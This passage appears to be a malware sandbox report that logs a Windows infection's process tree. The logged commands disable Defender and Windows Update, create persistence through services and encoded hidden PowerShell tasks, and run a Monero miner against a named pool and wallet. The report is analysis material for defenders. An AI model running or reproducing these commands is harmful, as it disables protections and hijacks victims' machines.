                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                          12⤵
                                                                                                                            PID:2992
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                        10⤵
                                                                                                                          PID:2800
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                            11⤵
                                                                                                                              PID:1516
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                12⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:2812
                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                  13⤵
                                                                                                                                    PID:2572
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                            9⤵
                                                                                                                              PID:3316
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                10⤵
                                                                                                                                  PID:3376
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                    11⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:3400
                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                      12⤵
                                                                                                                                        PID:3752
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\DnepKhw.exe\" it /enZdidaQdW 385118 /S" /V1 /F
                                                                                                                                  9⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:3868
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                  9⤵
                                                                                                                                    PID:3924
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                      10⤵
                                                                                                                                        PID:3948
                                                                                                                                        • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                          11⤵
                                                                                                                                            PID:3956
                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2060 -s 880
                                                                                                                                  6⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:1728
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1556
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 72
                                                                                                                                  6⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Program crash
                                                                                                                                  PID:924
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:2352
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
                                                                                                                                  6⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:2596
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000272001\FirstZ.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000272001\FirstZ.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2664
                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                    7⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:3056
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                    7⤵
                                                                                                                                      PID:1560
                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        8⤵
                                                                                                                                          PID:2656
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                        7⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:344
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                        7⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2216
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                        7⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2408
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                        7⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2904
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                        7⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:1020
                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                        7⤵
                                                                                                                                          PID:2436
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                          7⤵
                                                                                                                                            PID:852
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            7⤵
                                                                                                                                              PID:344
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                              7⤵
                                                                                                                                                PID:1052
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                                                                                                                7⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:2440
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                                                                                                                7⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3144
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                7⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3176
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe start "WSNKISKT"
                                                                                                                                                7⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3184
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:1992
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 68
                                                                                                                                              6⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Program crash
                                                                                                                                              PID:2316
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000014001\5e4913c117.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000014001\5e4913c117.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        PID:1948
                                                                                                                                      • C:\Users\Admin\1000017002\cb34b3b35f.exe
                                                                                                                                        "C:\Users\Admin\1000017002\cb34b3b35f.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:1128
                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2528
                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                      "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:2648
                                                                                                                                      • C:\Windows\Temp\826643.exe
                                                                                                                                        "C:\Windows\Temp\826643.exe" --list-devices
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:2164
                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2808
                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                      "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1080
                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:1952
                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                      "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:608
                                                                                                                                      • C:\Windows\Temp\693706.exe
                                                                                                                                        "C:\Windows\Temp\693706.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:2356
                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-1465514683134971029949653133-1099653442-1261741085338673096-17629404061753786955"
                                                                                                                                    1⤵
                                                                                                                                      PID:2192
                                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                                      taskeng.exe {D9A858FE-14B8-45AE-8CFA-0DBE64AB8C5F} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
                                                                                                                                      1⤵
                                                                                                                                        PID:1940
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                                                                                                                          2⤵
                                                                                                                                            PID:2940
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                                                                                                                            2⤵
                                                                                                                                              PID:972
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                              2⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:3628
                                                                                                                                          • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                            C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:2112
                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                2⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:2556
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                2⤵
                                                                                                                                                  PID:2480
                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3020
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:2296
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:1560
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:1364
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:1292
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:1576
                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2416
                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2420
                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2020
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3028
                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                            C:\Windows\system32\conhost.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2556
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              explorer.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2276
                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                              taskeng.exe {6B8C8773-FEF3-42DF-8AE0-9CC3820424CB} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1380
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\DnepKhw.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\DnepKhw.exe it /enZdidaQdW 385118 /S
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1516
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2020
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3156
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:3144
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:3196
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2720
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1052
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:3080
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:852
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:3216
                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:3176
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:3200
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:344
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:3084
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3224
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:3232
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:3292
                                                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:3256
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "gPALfQLGq" /SC once /ST 06:00:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:3352
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /run /I /tn "gPALfQLGq"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3576
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "gPALfQLGq"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2652
                                                                                                                                                                                                    • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                                      C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3240
                                                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:3248
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3352
                                                                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3412
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                              PID:3360
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                              PID:3424
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                              PID:3456
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                              PID:3520
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                              PID:3560
                                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3584
                                                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:3592
                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3600
                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3608
                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                      C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3616
                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:3688

                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                      Initial Access

                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                      Command and Scripting Interpreter

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1059

                                                                                                                                                                                                                      PowerShell

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1059.001

